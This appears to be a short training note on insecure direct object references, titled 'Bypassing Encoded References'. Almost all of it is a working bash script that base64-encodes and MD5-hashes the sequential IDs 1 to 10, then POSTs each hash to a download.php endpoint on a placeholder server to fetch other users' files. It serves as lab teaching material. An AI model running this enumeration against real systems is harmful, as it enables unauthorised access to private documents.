Bypassing Encoded References
for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done#!/bin/bash
for i in {1..10}; do
for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
done
done





Last updated